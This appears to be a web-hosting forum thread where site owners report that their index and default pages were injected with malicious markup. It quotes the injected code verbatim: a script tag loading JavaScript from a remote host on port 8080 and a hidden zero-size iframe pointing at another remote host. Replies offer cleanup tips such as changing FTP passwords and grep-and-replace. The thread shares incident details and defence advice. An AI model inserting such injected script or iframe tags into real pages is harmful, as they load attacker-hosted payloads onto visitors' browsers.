I just found out my main site was down for hours! - i had a similar thing happen on one of my other hosts, but this just happened on this host. all my index.* pages as well as my default.* pages (both html, php, etc...) now contain code at the bottom of the pages with this code: <script type="text/javascript" src="http://sortie.newcomputerservices.com:8080/Technology_Services.js"></script> <!--dff017bcd8abc7360d35f4fc94e5a26b--> Code (markup): Has anyone encountered this today? please help - how can i fix this? a server wide grep ? just delete the code and all is well? - what can i do to stop this? Splavik
None of our servers have been hit since we installed our new system to block such attacks. The fastest way would be to do a grep and replace tactic on all files.
I am facing this code attack on 2 of my sites on different servers <iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://roots.choufouna.com:8080/home/1/" width="0"></iframe> <!--73e181c1b8bd4e09d3bc7f39bb0cb1dd-->
sorry for my rather late "bump" to this thread but i read so much about this..... and was attacked twice now. Here is what i found out for any other - future cases. First thing - change your FTP PASSWORD right away - to be able to modify files on your server - the attack was most likely automatic - thus ftp You probably accessed your server's FTP from work or a big network that had some sniffers on it (infiltrated but what are you gonna do) anyway, what happened to me was i was accessing from work - and from home i have wayyyy more sites listed in my cuteFTP, yet none of the ones that i only have at home were hacked - so source of hack came from my network at work. If you change the FTP password right away you'll be good - only then make the fixes - yes grep is good -but i found certain files had a different url they were linking to (as shown above) and different <!--xxxxxxxxxx--> string so be careful out there - hopefully this helps someone